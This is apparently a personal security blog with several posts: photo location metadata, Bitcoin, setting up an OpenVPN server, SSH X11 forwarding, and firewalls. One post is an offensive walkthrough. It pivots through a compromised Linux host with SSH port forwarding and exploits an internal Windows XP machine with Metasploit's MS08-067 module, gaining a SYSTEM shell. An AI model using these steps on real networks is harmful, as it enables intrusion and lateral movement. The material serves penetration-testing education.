Location Service in Pictures

Background

Posting pictures on social media is the trend these days. People like to show off their lifestyle, kids, vacations, material possessions, spouses, gf/bf/etc. While it is entirely an individual choice to do so, not many people are aware that pictures taken with mobile apps have built-in location services. Usually, these apps prompt the user with an option to either activate or deactivate it. There are sneaky apps that don't. Some can even activate it without your consent and sneakishly deactivate after you used it, however, this is no longer possible with newer versions of Android as Google has disallowed apps to directly access GPS service. Beware, there are apps available in the play store posing as legitimate ones. Though you are more likely to pick up malware from 3rd party sites. In case of iOS, the chance is less since 3rd party apps are not available on Apple phones.

What is Location Service?

Location service is basically GPS coordinates mapped onto a geographical map. Almost all mobile devices now have GPS chips built into it. People switch on GPS when using Waze or Google maps. Modern GPS locks on to 4 low orbiting satellites to home in your precise location and is accurate up to 4 meters! In the past, such accuracy was only available to the military. But these days, it is free for anyone. Google location service collates information from 3 different sources:

1. GPS - which is the primary choice and the most accurate.
2. WiFi Signal - accuracy depends on the signal strength, Google keeps a location list of common public hotspots such as airports, train terminals, Starbucks outlets around the world.
3. Cellular Base Station Transmission - accurate up to few hundred meters. Based on site triangulation of recipients' signal strength relative to the distance between 1 or more base stations.

Location Service Dissected

In this article, I will explain how to detect location services in your pictures. Such data is also referred as metadata, or data about data. Firstly, lets take a photo with a location service turned ON.

Picture above was taken with Location Service turned ON

Most modern Operating Systems are able to detect metadata tags embedded in popular picture formats such as jpeg, gif, tiff, png and bmp. Here's an example of a GPS coordinate in a picture detected using Windows:

On Android:

Extensive metadata can be read using an EXIF tool. Here's a sample of metadata detected on Linux:

Who and Why Do We need Such Service?

From a commercial point of view, such information is useful for marketing purposes. Mobile apps are not free without a reason. There must be some commercial returns for providing a 'free' service. How do you think Google, FaceBook, Instagram, Twitter make so much $$$$? Whatever information you post, are stored for analytics on their servers. We are talking about terabytes of data from around the world! It can be used to create targeted advertisements based on individual preferences. Imagine, if you knew your customers precise location, favourite food, hangout spots, clothes, shopping behaviour, names, age, etc. They virtually know what products and services to entice you. These companies know alot about you than you are consciously aware. Location Service is just the tip of the iceberg. For example, Google & FB have been around for at least a decade, we have our emails, pictures, practically our whole life story stored on their servers! These giants also acquire other companies. A good example was the acquisition of Instagram & Waze by FB and Google respectively. So now, they also know where you travel and what you see! Reminds me of Skynet in the Terminator movie!

How To Protect Myself?

Unless you are a criminal or someone wanted, I wouldn't be too worried about your personal information being mined, afterall it is primarily for commercial purposes. But I would be careful of over exposing your personal information for everybody to see. These companies are usually govern by local privacy laws, depending on which country you live in, your personal information should be protected. However, that doesn't mean you should happily post information that can further incriminate you. Such as posting picture of your kids schools, your private residence, car registration, social security id, passport, banking details, etc. One very important step before you install any mobile app, is to check its permission settings. On Android, this can be seen in Settings - Apps - Apps Info. See screenshot below:

Note that the above app needs location service and camera permission. That means it can activate your phone's camera and GPS when needed ;-) where possible, you may opt to deactivate some of these permissions but your app might complain or cease to function. The final decision to install the app is up to you, if you are confident that the app is trusted, by all means, go ahead and install it.

Screenshot Depicts the App Permission Settings which can be changed

Summary

The world is becoming smaller, with the advert of social media and the Internet, we are certainly more connected. Practising self censorship and user discretion is imperative in creating a safer world. Remember, information security is everyone's responsibility and it is our responsibility to educate the people that we love.

What's The Fuss With Bitcoins?

Bitcoins are the rage now. People are talking about the crypto currency and are buying it in the hopes that the value will increase in the future. So what's bitcoin? To sum it out, bitcoin is a virtual currency created by a mysterious person by the name of Satoshi Nakamoto, no one really knows his real identify, though, there have been documented cases of 'him' being arrested in Australia.

Basically, bitcoin is a a product of a computed algorithm with a finite value. Its value is determine by general supply and demand. While there is no central orginization that governs it, its value is mined by computers participating (known as Blockchain) around the world. When it was first intercepted, it was easy to compute/mine a bitcoin but over the years, its algorithm has computationally increased, thus, making it more difficult to create. This was done by design, to control its value. Anyone that wishes to trade in bitcoin will have an electronic wallet that is protected by a private key with passphrase. It can be stored offline on am usb drive or online with a bitcoin exchange service. When a transaction is made, all computers that are in the blockchain will update its individual ledger. It is akin to everyone in the room updating their 'I owe you' books. For example, you borrow Jim 1 dollar, everyone in the room will take note of it and when you pay him back, they will make note of it again. In order to mine more bitcoins, computers in this blockchain will have to compute an algorithm to validate these transactions. These 'miners', will be rewarded with a bitcoin value.

Some people predict that bitcoin value will increase in the future, what makes it more attractive is that more and more merchants on the Internet are accepting bitcoins for payment of goods and services. There are also bitcoin 'exchange' services on the net that provides conversions of bitcoin to currency for a small service fee.

From a security perspective,  bitcoin provides anonymity as you do not need to reveal your personal identity to be part of it blockchain. Every wallet is identified by a computed hash value. However, be sure to protect your bitcoin wallet, never fully trust bitcoin exchanges with your private key. If someone gets hold of it, he can make transactions using your wallet. There was a recent case of a bitcoin exchanged hacked, as a result, many people incurred losses.

Setting Up Your Own VPN Server

In my last article, I touched on protecting your data. One of the suggested mitigation is to encrypt data during transmission. Anytime after you connect to an untrusted network such as a public wifi hotspot, you should turn on VPN immediately. In my article today, I will describe the steps to setup your own VPN server. I recommend to setup your own server rather than purchase VPN services off the net because you will have more control over the encryption level and granularity of its logs. Beware, some free VPN services keep logs of your connections for commercial purposes. Also, some VPN services are configured with weak encryption or incorrect configurations that can lead to unwanted data leaks.

The OpenVPN package is an open source solution and is free. Firstly, you will need to find a VPS(Virtual Private Server) that supports TUN(Tunneling). I recommend vpscheap. The Internet speed is fast and they don't limit your bandwidth.

VPS Configuration

Firstly, check the TUN/TAP option ON in Control Panel:

Once that is done, you will need to login to your VPS Operating System. I recommend Ubuntu 14 64bit. I won't cover the steps on setting it up here as it is quite straight forward once you have bought a vps subscription.

OpenVPN Server installation
On the operating system of your choice, install openvpn using the root account:

1. apt-get update
2. apt-get install openvpn

OpenVPN Server configuration

Now, create a simple config file:

# Which local IP address should OpenVPN

# listen on? (optional)

local xxx.xxx.xxx <-- your server ip addr here

# Which TCP/UDP port should OpenVPN listen on?

# If you want to run multiple OpenVPN instances

# on the same machine, use a different port

# number for each one.  You will need to

# open up this port on your firewall.

port 1194

# TCP or UDP server?

proto udp

# "dev tun" will create a routed IP tunnel,

# "dev tap" will create an ethernet tunnel.

# Use "dev tap0" if you are ethernet bridging

# and have precreated a tap0 virtual interface

# and bridged it with your ethernet interface.

# If you want to control access policies

# over the VPN, you must create firewall

# rules for the the TUN/TAP interface.

# On non-Windows systems, you can give

# an explicit unit number, such as tun0.

# On Windows, use "dev-node" for this.

# On most systems, the VPN will not function

# unless you partially or fully disable

# the firewall for the TUN/TAP interface.

;dev tap

dev tun

# Windows needs the TAP-Win32 adapter name

# from the Network Connections panel if you

# have more than one.  On XP SP2 or higher,

# you may need to selectively disable the

# Windows firewall for the TAP adapter.

# Non-Windows systems usually don't need this.

;dev-node MyTap

# SSL/TLS root certificate (ca), certificate

# (cert), and private key (key).  Each client

# and the server must have their own cert and

# key file.  The server and all clients will

# use the same ca file.

#

# See the "easy-rsa" directory for a series

# of scripts for generating RSA certificates

# and private keys.  Remember to use

# a unique Common Name for the server

# and each of the client certificates.

#

# Any X509 key management system can be used.

# OpenVPN can also use a PKCS #12 formatted key file

# (see "pkcs12" directive in man page).

ca ca.crt

cert cert.crt

key secret.key  # This file should be kept secret

# Diffie hellman parameters.

# Generate your own with:

#   openssl dhparam -out dh1024.pem 1024

# Substitute 2048 for 1024 if you are using

# 2048 bit keys. 

dh dh2048.pem

# Configure server mode and supply a VPN subnet

# for OpenVPN to draw client addresses from.

# The server will take 10.8.0.1 for itself,

# the rest will be made available to clients.

# Each client will be able to reach the server

# on 10.8.0.1. Comment this line out if you are

# ethernet bridging. See the man page for more info.

server 10.8.0.0 255.255.255.0

# Maintain a record of client <-> virtual IP address

# associations in this file.  If OpenVPN goes down or

# is restarted, reconnecting clients can be assigned

# the same virtual IP address from the pool that was

# previously assigned.

ifconfig-pool-persist ipp.txt

# Configure server mode for ethernet bridging.

# You must first use your OS's bridging capability

# to bridge the TAP interface with the ethernet

# NIC interface.  Then you must manually set the

# IP/netmask on the bridge interface, here we

# assume 10.8.0.4/255.255.255.0.  Finally we

# must set aside an IP range in this subnet

# (start=10.8.0.50 end=10.8.0.100) to allocate

# to connecting clients.  Leave this line commented

# out unless you are ethernet bridging.

;server-bridge 10.8.0.4 255.255.255.0 10.8.0.50 10.8.0.100

# Configure server mode for ethernet bridging

# using a DHCP-proxy, where clients talk

# to the OpenVPN server-side DHCP server

# to receive their IP address allocation

# and DNS server addresses.  You must first use

# your OS's bridging capability to bridge the TAP

# interface with the ethernet NIC interface.

# Note: this mode only works on clients (such as

# Windows), where the client-side TAP adapter is

# bound to a DHCP client.

;server-bridge

# Push routes to the client to allow it

# to reach other private subnets behind

# the server.  Remember that these

# private subnets will also need

# to know to route the OpenVPN client

# address pool (10.8.0.0/255.255.255.0)

# back to the OpenVPN server.

;push "route 192.168.10.0 255.255.255.0"

;push "route 192.168.20.0 255.255.255.0"

# To assign specific IP addresses to specific

# clients or if a connecting client has a private

# subnet behind it that should also have VPN access,

# use the subdirectory "ccd" for client-specific

# configuration files (see man page for more info).

# EXAMPLE: Suppose the client

# having the certificate common name "Thelonious"

# also has a small subnet behind his connecting

# machine, such as 192.168.40.128/255.255.255.248.

# First, uncomment out these lines:

;client-config-dir ccd

;route 192.168.40.128 255.255.255.248

# Then create a file ccd/Thelonious with this line:

#   iroute 192.168.40.128 255.255.255.248

# This will allow Thelonious' private subnet to

# access the VPN.  This example will only work

# if you are routing, not bridging, i.e. you are

# using "dev tun" and "server" directives.

# EXAMPLE: Suppose you want to give

# Thelonious a fixed VPN IP address of 10.9.0.1.

# First uncomment out these lines:

;client-config-dir ccd

;route 10.9.0.0 255.255.255.252

# Then add this line to ccd/Thelonious:

#   ifconfig-push 10.9.0.1 10.9.0.2

# Suppose that you want to enable different

# firewall access policies for different groups

# of clients.  There are two methods:

# (1) Run multiple OpenVPN daemons, one for each

#     group, and firewall the TUN/TAP interface

#     for each group/daemon appropriately.

# (2) (Advanced) Create a script to dynamically

#     modify the firewall in response to access

#     from different clients.  See man

#     page for more info on learn-address script.

;learn-address ./script

# If enabled, this directive will configure

# all clients to redirect their default

# network gateway through the VPN, causing

# all IP traffic such as web browsing and

# and DNS lookups to go through the VPN

# (The OpenVPN server machine may need to NAT

# or bridge the TUN/TAP interface to the internet

# in order for this to work properly).

push "redirect-gateway def1 bypass-dhcp"

# Certain Windows-specific network settings

# can be pushed to clients, such as DNS

# or WINS server addresses.  CAVEAT:

# http://openvpn.net/faq.html#dhcpcaveats

# The addresses below refer to the public

# DNS servers provided by opendns.com.

push "dhcp-option DNS 8.8.8.8"

push "dhcp-option DNS 8.8.4.4"

# Uncomment this directive to allow different

# clients to be able to "see" each other.

# By default, clients will only see the server.

# To force clients to only see the server, you

# will also need to appropriately firewall the

# server's TUN/TAP interface.

;client-to-client

# Uncomment this directive if multiple clients

# might connect with the same certificate/key

# files or common names.  This is recommended

# only for testing purposes.  For production use,

# each client should have its own certificate/key

# pair.

#

# IF YOU HAVE NOT GENERATED INDIVIDUAL

# CERTIFICATE/KEY PAIRS FOR EACH CLIENT,

# EACH HAVING ITS OWN UNIQUE "COMMON NAME",

# UNCOMMENT THIS LINE OUT.

duplicate-cn

# The keepalive directive causes ping-like

# messages to be sent back and forth over

# the link so that each side knows when

# the other side has gone down.

# Ping every 10 seconds, assume that remote

# peer is down if no ping received during

# a 120 second time period.

keepalive 120 340

# For extra security beyond that provided

# by SSL/TLS, create an "HMAC firewall"

# to help block DoS attacks and UDP port flooding.

#

# Generate with:

#   openvpn --genkey --secret ta.key

#

# The server and each client must have

# a copy of this key.

# The second parameter should be '0'

# on the server and '1' on the clients.

;tls-auth ta.key 0 # This file is secret

# Select a cryptographic cipher.

# This config item must be copied to

# the client config file as well.

;cipher BF-CBC        # Blowfish (default)

cipher AES-128-CBC   # AES

;cipher DES-EDE3-CBC  # Triple-DES

# Enable compression on the VPN link.

# If you enable it here, you must also

# enable it in the client config file.

comp-lzo

# The maximum number of concurrently connected

# clients we want to allow.

max-clients 6

# It's a good idea to reduce the OpenVPN

# daemon's privileges after initialization.

#

# You can uncomment this out on

# non-Windows systems.

user nobody

group nogroup

# The persist options will try to avoid

# accessing certain resources on restart

# that may no longer be accessible because

# of the privilege downgrade.

persist-key

persist-tun

# Output a short status file showing

# current connections, truncated

# and rewritten every minute.

;status openvpn-status.log

# By default, log messages will go to the syslog (or

# on Windows, if running as a service, they will go to

# the "\Program Files\OpenVPN\log" directory).

# Use log or log-append to override this default.

# "log" will truncate the log file on OpenVPN startup,

# while "log-append" will append to it.  Use one

# or the other (but not both).

;log         openvpn.log

;log-append  openvpn.log

# Set the appropriate level of log

# file verbosity.

#

# 0 is silent, except for fatal errors

# 4 is reasonable for general usage

# 5 and 6 can help to debug connection problems

# 9 is extremely verbose

verb 3

# Silence repeating messages.  At most 20

# sequential messages of the same message

# category will be output to the log.

;mute 20

Save the file as server.conf in /etc/openvpn/. Now, you will need to create the following certs:

1. ca.crt
2. cert.crt
3. secrect.key


Create your certs

The steps for creating the certs can be found, here or here.

Once you have created them, save these certs in /etc/openvpn/.

Start openvpn service:

# service openvpn start

OR

# openvpn /etc/openvpn/server.conf

Setup IPTABLES to SNT/MASQ the connections outbound from your vpn server

# iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to <your public ip here>


Activate ip fwd

/etc/sysctl.conf:
net.ipv4.ip_forward = 1

If everything went right, you should not see any errors, that means openvpn server is successfully running on your vps.

OpenVPN Client Installation and configuration

Create the following client config:

# Specify that we are a client and that we

# will be pulling certain config file directives

# from the server.

client

# Use the same setting as you are using on

# the server.

# On most systems, the VPN will not function

# unless you partially or fully disable

# the firewall for the TUN/TAP interface.

;dev tap

dev tun

# Windows needs the TAP-Win32 adapter name

# from the Network Connections panel

# if you have more than one.  On XP SP2,

# you may need to disable the firewall

# for the TAP adapter.

;dev-node MyTap

# Are we connecting to a TCP or

# UDP server?  Use the same setting as

# on the server.

proto udp

# The hostname/IP and port of the server.

# You can have multiple remote entries

# to load balance between the servers.

remote aaa.bbb.ccc.ddd xxx     <<------- your openvpn server and port here!

;remote my-server-2 1194

# Choose a random host from the remote

# list for load-balancing.  Otherwise

# try hosts in the order specified.

;remote-random

# Keep trying indefinitely to resolve the

# host name of the OpenVPN server.  Very useful

# on machines which are not permanently connected

# to the internet such as laptops.

resolv-retry infinite

# Most clients don't need to bind to

# a specific local port number.

nobind

# Downgrade privileges after initialization (non-Windows only)

;user nobody

;group nogroup

# Try to preserve some state across restarts.

persist-key

persist-tun

# If you are connecting through an

# HTTP proxy to reach the actual OpenVPN

# server, put the proxy server/IP and

# port number here.  See the man page

# if your proxy server requires

# authentication.

;http-proxy-retry # retry on connection failures

;http-proxy [proxy server] [proxy port #]

# Wireless networks often produce a lot

# of duplicate packets.  Set this flag

# to silence duplicate packet warnings.

;mute-replay-warnings

# SSL/TLS parms.

# See the server config file for more

# description.  It's best to use

# a separate .crt/.key file pair

# for each client.  A single ca

# file can be used for all clients.

ca ca.crt

cert client1.crt

key client.key

# Verify server certificate by checking

# that the certicate has the nsCertType

# field set to "server".  This is an

# important precaution to protect against

# a potential attack discussed here:

#  http://openvpn.net/howto.html#mitm

#

# To use this feature, you will need to generate

# your server certificates with the nsCertType

# field set to "server".  The build-key-server

# script in the easy-rsa folder will do this.

ns-cert-type server

# If a tls-auth key is used on the server

# then every client must also have the key.

;tls-auth ta.key 1

# Select a cryptographic cipher.

# If the cipher option is used on the server

# then you must also specify it here.

cipher AES-128-CBC

# Enable compression on the VPN link.

# Don't enable this unless it is also

# enabled in the server config file.

comp-lzo

# Set log file verbosity.

verb 3

# Silence repeating messages

;mute 20

The client.conf file along with the certs should be transferred to your client device. The step below describes the steps to configure an Android device to connect to openvpn server:

1. Download your favourite vpn client, I recommend OpenVPN client.
2. Transfer client.conf along with the following certs:

ca.crt
client1.crt

client.key

3. Load client.cfg into the vpn client

4. Connect to your vpn server

In summary, using a correctly configured VPN will protect your privacy and your connection from hijacking but it will NOT protect you from identity theft or intrusions. Always practice safe browsing and never post sensitive information on the Internet. Irregardless of which website you are submitting personal data, always scrutinise the need for having to provide them your personal info.

Getting Around Multihome Hosts - Part II

In my first article I described how to pivot around a multihome host using meterpreter. However, if you don't have the luxury of using one or choose not to use it, all hope is not lost. You can still use other methods of pivoting. In this second installment, I will describe method of pivoting commonly used in Unix/Linux hosts.

SSH (secure shell) is a common encrypted protocol installed by default on almost all linux hosts for remote administration. It provides administrators with  command line access to run administrative tasks. Upon successfully owning a machine running SSH, it is trivial to use it to forward connections to another hosts securely. With openSSH, you have 3 methods of forwarding; local port forwarding(-L), remote port forwarding(-R) and SOCKS(-D). We will be using the first method.

Host A is a Linux host with OpenSSH installed by default. Host B is a Windows host without ssh.

Depiction of Hosts:

<Attacker host> ------------------- <Host A> -------------------- <Host B>
IP: 192.168.0.182               eth0: 192.168.0.191         192.168.52.134
                                     eth1: 192.168.52.135
     
We assume that you have fully compromised Host A with root rights. By doing so, you should already have the root credentials to remotely ssh to Host A, the objective is to further compromise Host B.
                                              
On Attacker Host
We map port 445 to localhost using ssh.

# ssh -L 445:192.168.52.134:445 root@192.168.0.191
root@192.168.0.191's password: 
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
Last login: Tue Jun 20 05:59:22 2017
root@hostA:~#

Since we'll be exploiting Host A using msf, I would like to map the meterpreter port 4444

locally too. The above command, we can port fwd 2 services in 1 command:

# ssh -L 445:192.168.52.134:445 -L 4444:192.168.52.134:4444 root@192.168.0.191 

On another terminal on Host A, check your netstat: 

# netstat -an | more
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.1:4444          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:445           0.0.0.0:*               LISTEN     
tcp        0      0 192.168.0.182:49620     192.168.0.191:22        ESTABLISHED
<--snip--> 

Now we have 2 ports mapped to localhost. Lets use nmap to fingerpring the OS of host B, note

that Host B is not listening on port 445 on Host A as localhost:

# nmap -A -p 445 127.0.0.1 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-20 09:16 SGT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000088s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows XP microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.8 - 4.6
Network Distance: 0 hops
Service Info: OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 17h28m05s, deviation: 0s, median: 17h28m05s
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: tt-af6d434411ff
|   NetBIOS computer name: TT-AF6D434411FF
|   Workgroup: WORKGROUP
|_  System time: 2017-06-20T11:45:10-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds 

Great! now we can see the OS type is WinXP, lets use msf to exploit it using netapi:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 127.0.0.1
rhost => 127.0.0.1

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp

I changed the payload to bind_tcp instead of reverse_tcp because the port 4444 is already

listening and reverse_tcp won't work if it is.

msf exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    127.0.0.1        yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     127.0.0.1        no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > run

[*] Started bind handler
[*] Sending stage (957487 bytes) to 127.0.0.1
[*] 127.0.0.1:445 - Automatically detecting the target...
[*] 127.0.0.1:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 127.0.0.1:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 127.0.0.1:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (127.0.0.1:40987 -> 127.0.0.1:4444) at 2017-06-20 09:31:22 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

There you go! Some people might ask, how do I portscan host B from the attacker host? Unfortunately,

because Host B is a Windows machine and doesn't have openSSH installed, we can't setup the SOCKS

service using ssh. If this happens, you got to rely on Host A directly to recon Host B.

In the next article, I will discuss about how to pivot from a Windows host.

Exporting X Session From Linux to Mac

I primarily work on Linux and Mac for different reasons, firstly for the fun of it, and I get to savour the best that these different Operating Systems has to offer. There are times I would like to take some dev work onto my Mac, however, the app resides on my Linux host that requires a graphical environment that is exclusive on my Linux host. This graphical session is known as Xwindow system. With Xwindow, you can export graphical sessions to another host to run apps without having to install the app on the machine that you are running it on! That means you can run Linux apps on a Mac or Windows host.

The traditional method was to export Xwindow using the 'xhost +myremotehost.com' and 'export DISPLAY=myremotehost.com:0.0' command, but it also requires me to poke more holes in my firewall to allow the Xwindow session thru. This method is not recommended as there are known security risks associated with exporting X remotely as the session can be sniffed or worse hijacked. One way to securely export Xwindow is to use the built X11 forwarding function in OpenSSH. It allows you to export Xwindow via a ssh session that is encrypted by default.

On the Linux host where the graphical apps resides, ensure the following lines are enabled in /etc/ssh/sshd_config:

X11Forwarding yes

X11DisplayOffset 10

Make sure you restart/reload ssh after making changes.

If you are running MacOS 10.x and above, you will need to download XQuartz. Unfortunately, newer MacOs do not support the same X server that Linux does. Further instructions on where and how to download XQuartz can be found, here.

Once that is done, on your Mac host, launch XQuartz -> Application -> xterm and ssh to your Linux host with the -X flag:

Once you have successfully authenticated, just launch your fav X application:

There you go! You now have a Linux app that runs on Mac. Pretty cool huh? Well for me atleast :-p

About Internet Firewalls

A Firewall is primarily designed to reduce the exposed surface of hosts to unauthorised network hacking. By having a firewall installed either at the ingress gateway or host, grants the administrator granular control of all network communication protocols that passes thru it. Firewalls have been thru at least 3 evolutions, the first generation were mere packet filters that intercepted network traffic passing thru and comparing its packet headers against a custom ruleset. The 2nd generation firewalls had a stateful table to track all packet and datagram sessions, it is now possible to control the flow of handshake and teardown of communication protocols, an important factor is preventing Denial of Service(DOS) attacks. The 3rd generation firewalls further built on application intelligence; a hybrid of application proxies and stateful inspection technology. In this article, we will discuss the general approach of firewalls in protecting a network from malicious attack.

Figure depicts typical firewall layout

The first phase of an intrusion usually begins with the act of enumeration or probing. The act of figuring as much about the intended target is essential to successfully infiltrate a target. For example, a hacker usually runs a port scan against a target to identify services/ports that are available. Upon successful identification, the next step is to probe it for flaws or typical misconfigurations. Upon accurate fingerprinting of its exact communication protocol and inner workings will the hacker have an idea of how to exploit it further. This is where a firewall comes into the defence.

Figure depicts firewall handling incoming TCP handshake.

A firewall has a defined ruleset to control the directional flow of all network communication protocols passing thru it. It controls TCP/IP handshakes, dropping any communication that do not conform to standard protocols. In the case of a hacker trying to probe, the firewall detects an abnormality and denies the probe from further enumerating its hosts behind it. A firewall is not designed to stop hackers entirely, if a service protocol was allowed to pass thru, it will be susceptible to further attacks. This usually happens when common protocols such as HTTP traffic are publicly allowed. Hence, why web servers are commonly compromised/defaced.

Another role of the firewall is to stop Denial of Service attacks (DOS). A DOS attack happens when a server receives huge amounts of requests that overwhelms its resources resulting in service degradation or total disruption. A common attack is to utilise hundreds of previously compromised hosts called bots to send huge amount of requests to the same host or network simultaneously, this is usually referred as a Distributed Denial of Service (DDOS)attack. A properly configured firewall can detect abnormality either via unusual fluctuations in the volume of requests or via the spoofed IP addresses thrown at it. A stateful firewall maintains a connection table that tracks each connection, by tearing down and inspecting each packet that comes thru it.

Firewalls have evolved and are continuing to evolve, some provide advance intelligence such as deep packet inspection, threat analysis and intrusion prevention build into it. Such firewalls are a successful hybrid of application proxy and stateful inspection technology. It provides intelligence in inspecting the application layer of common unencrypted protocols such as HTTP, FTP, ICMP, SMTP, POP3, IMAP, DNS, etc. The wide adoption of TLS/SSL encryption posed a challenge for application aware firewalls. This means, firewalls have to act as a MitM to proxy SSL certificates in order for it to inspect packets. Such act further weakens the encryption used between these hosts and in my opinion is not encouraged.

Figure depicts the MiTM proxy of a SSL traffic between Client and Server

Firewalls are about controlling directional flow of network communication protocols, thus limiting its attack vector. Firewalls are a staple solution in any Internet facing host. Most modern Windows OS have built-in firewalls activated by default. Making common attacks difficult for hackers, that is why methods of intrusions are also evolving to client side attacks, eg. Phishing, Cross Side Forgery attacks, Cross Side Scripting (XSS). Such attacks are initiated from the client host, firewall rules are commonly lax for outgoing or trusted connections. Thus, granting an opportunity for a hacker to carry out devious deeds. Example, an unsuspecting user is sent a malicious attachment in a word document via an email claiming to be from his boss. He will most likely open it and a malicious code embedded in it will exploit a vulnerability such as Remote Code Execution (RCE) bug in SMBv1 on his Windows OS, triggering it to execute malware to encrypt contents of his hard drive and further propagating itself to other hosts in his internal network using the same vulnerable service (SMBv1).


It is imperative that Firewalls are independent from any dynamic routing protocols to avoid poisoning of routes. Such activity are detrimental as it can be used to influence the access control to safe guard the network and hosts behind it.